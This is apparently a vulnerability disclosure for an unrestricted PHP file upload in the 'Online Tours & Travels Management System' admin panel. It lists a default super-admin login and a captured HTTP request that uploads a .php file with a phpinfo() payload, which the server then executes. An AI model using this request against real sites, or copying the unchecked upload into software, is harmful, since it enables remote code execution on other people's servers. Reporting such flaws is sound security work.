Online Tours & Travels Management System ab.php unrestricted upload

Vendor: https://www.sourcecodester.com/php/14510/onlinetourstravelsmanagementsystemprojectusingphpandmysql.htm

Login account: mayuri.infospace@gmail.com / admin (Super Admin account)
Vulnerable URL: ip/tour/admin/ab.php (the upload form; it submits to tour/admin/operations/aa.php, as the request below shows)


Request captured from the browser for the file upload (the file part is named "img"; the uploaded file is a .php script with a phpinfo() payload):

POST /OTMSP-Final-source-code/sourcecode/tour/admin/operations/aa.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------2293274527734505501588775325
Content-Length: 357
Origin: http://localhost
Connection: close
Referer: http://localhost/OTMSP-Final-source-code/sourcecode/tour/admin/ab.php
Cookie: PHPSESSID=orctgl8jtqmkpcvehrbapg6po2
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------2293274527734505501588775325
Content-Disposition: form-data; name="img"; filename="123.php"
Content-Type: application/octet-stream

<?php phpinfo(); ?>
-----------------------------2293274527734505501588775325
Content-Disposition: form-data; name="submit"


-----------------------------2293274527734505501588775325--


The uploaded file is saved in the directory touradminimg. No extension or content-type check is applied: the .php file is accepted exactly as submitted.

We visited the file's location in the browser and found that the code had been executed.
